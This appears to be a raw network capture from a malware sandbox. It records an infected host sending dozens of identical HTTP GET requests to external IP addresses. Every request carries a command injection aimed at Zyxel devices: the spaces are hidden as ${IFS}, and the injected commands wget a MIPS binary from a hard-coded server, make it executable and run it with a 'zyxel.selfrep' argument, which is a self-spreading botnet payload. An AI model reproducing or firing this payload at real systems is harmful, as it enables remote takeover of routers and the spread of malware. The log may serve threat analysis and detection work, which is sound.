                                            Feb 2, 2024 06:21:15.680257082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5018192.168.2.1553870115.23.95.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680315018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5019192.168.2.1550868212.244.177.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680341005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5020192.168.2.1557288109.23.202.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680375099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5021192.168.2.155664857.74.81.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680428982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5022192.168.2.1551156176.237.22.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680464029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5023192.168.2.154384660.156.68.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680517912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5024192.168.2.154584272.58.163.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680546045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5025192.168.2.1547858104.170.55.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680593967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5026192.168.2.154800837.250.150.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680624008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5027192.168.2.1535982159.130.118.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680665016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5028192.168.2.1560622169.135.49.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680711031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5029192.168.2.154802877.75.101.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680757046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5030192.168.2.153655280.115.86.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680790901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5031192.168.2.154965275.159.252.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680826902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5032192.168.2.1556244128.245.12.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680865049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5033192.168.2.1535690119.137.101.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680908918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5034192.168.2.1544844186.73.119.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680948019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5035192.168.2.155245099.218.1.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.680974960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5036192.168.2.153321219.29.12.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681025982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5037192.168.2.1560692212.68.125.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681058884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5038192.168.2.1538108126.127.83.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681138992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5039192.168.2.1535168146.7.79.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681149006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5040192.168.2.155445645.122.178.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681168079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5041192.168.2.1540682205.228.46.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681206942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5042192.168.2.1535592210.25.36.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681251049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5043192.168.2.1540616162.243.85.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681286097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5044192.168.2.155261496.37.225.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681317091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5045192.168.2.1548660204.22.210.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681384087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5046192.168.2.1557344150.36.232.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681399107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5047192.168.2.1559370158.34.32.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681442022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5048192.168.2.1554680118.176.45.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681487083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5049192.168.2.155133887.31.204.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681521893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5050192.168.2.1550732105.77.55.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681549072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5051192.168.2.153558823.181.244.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681587934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5052192.168.2.1559436142.81.73.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681627989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5053192.168.2.1555008178.239.131.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681668997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5054192.168.2.155228813.127.214.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681723118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5055192.168.2.154044854.150.243.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681751013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5056192.168.2.155355025.94.81.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681768894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5057192.168.2.1534118143.32.240.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681829929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5058192.168.2.155955898.244.107.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681858063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5059192.168.2.154419470.159.133.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681904078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5060192.168.2.1556214126.44.95.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681926966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5061192.168.2.155657278.172.108.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.681967020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5062192.168.2.153667017.180.4.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682009935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5063192.168.2.1545816211.32.200.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682065010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5064192.168.2.1533426216.20.35.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682111025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5065192.168.2.1548422154.19.50.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682157993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5066192.168.2.154284049.132.200.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682192087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5067192.168.2.15431969.135.178.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682245970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5068192.168.2.155910270.66.30.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682279110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5069192.168.2.154980413.146.64.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682316065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5070192.168.2.154356891.109.160.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682358027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5071192.168.2.154769862.15.107.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682419062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5072192.168.2.1559382216.186.133.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682446003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5073192.168.2.1534926204.129.180.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682478905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5074192.168.2.1535932217.28.225.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682523012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5075192.168.2.153911297.19.90.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682571888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5076192.168.2.153282047.239.43.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682595015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5077192.168.2.153797460.160.126.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682629108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5078192.168.2.1533836118.237.134.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682662964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5079192.168.2.155923057.116.72.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682724953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5080192.168.2.153335440.120.182.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:15.682769060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5081192.168.2.153323686.38.243.128443
                                            TimestampBytes transferredDirectionData
